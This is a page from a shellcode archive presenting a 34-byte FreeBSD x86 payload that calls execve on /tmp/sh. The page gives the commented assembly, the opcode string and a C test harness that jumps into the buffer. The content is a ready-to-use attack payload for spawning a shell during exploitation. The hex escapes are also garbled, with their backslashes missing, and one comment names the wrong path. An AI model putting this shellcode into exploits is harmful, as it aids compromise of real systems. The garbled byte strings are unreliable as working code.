[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : freebsd/x86 execve /tmp/sh 34 bytes
# Published : 2004-09-26
# Author : Claes Nyberg
# Previous Title : freebsd/x86 kldload /tmp/o.o 74 bytes
# Next Title : freebsd/x86 chown 0:0 , chmod 6755 & execve /tmp/sh 44 bytes
/*
* FreeBSD shellcode - execve /tmp/sh
*
* Claes M. Nyberg 20020120
*
* <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
*/
/**********************************************************
void
main()
{
__asm__("
xorl %eax, %eax # eax = 0
pushl %eax # string ends with NULL
pushl $0x68732f2f # push 'hs//' (//sh)
pushl $0x706d742f # push 'pmt/' (/tmp)
movl %esp, %ebx # ebx = argv[0] = string addr
pushl %eax # argv[1] = NULL
pushl %ebx # argv[0] = /bin//sh
movl %esp, %edx # edx = &argv[0]
pushl %eax # envp = NULL
pushl %edx # &argv[0]
pushl %ebx # *path = argv[0]
pushl %eax # Dummy
movb $0x3b, %al # al = 59 = execve
int $0x80 # execve(argv[0], argv, NULL)
xorl %eax, %eax # eax = 0
inc %eax # eax++
pushl %eax # Exit value = 1
pushl %eax # Dummy
int $0x80 # exit(1); (eax is 1 = execve)
");
}
************************************************************/
#include <stdio.h>
#include <string.h>
static char freebsd_code[] =
"x31xc0" /* xorl %eax, %eax */
"x50" /* pushl %eax */
"x68x2fx2fx73x68" /* pushl $0x68732f2f */
"x68x2fx74x6dx70" /* pushl $0x706d742f */
"x89xe3" /* movl %esp, %ebx */
"x50" /* pushl %eax */
"x53" /* pushl %ebx */
"x89xe2" /* movl %esp, %edx */
"x50" /* pushl %eax */
"x52" /* pushl %edx */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x3b" /* movb $0x3b, %al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xorl %eax, %eax */
"x40" /* inc %eax */
"x50" /* pushl %eax */
"x50" /* pushl %eax */
"xcdx80"; /* int $0x80 */
static char _freebsd_code[] =
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx74x6dx70x89xe3x50"
"x53x89xe2x50x52x53x50xb0"
"x3bxcdx80x31xc0x40x50x50"
"xcdx80";
void
main(void)
{
void (*code)() = (void *)freebsd_code;
printf("strlen code: %dn", strlen(freebsd_code));
code();
}
// www.Syue.com [2004-09-26]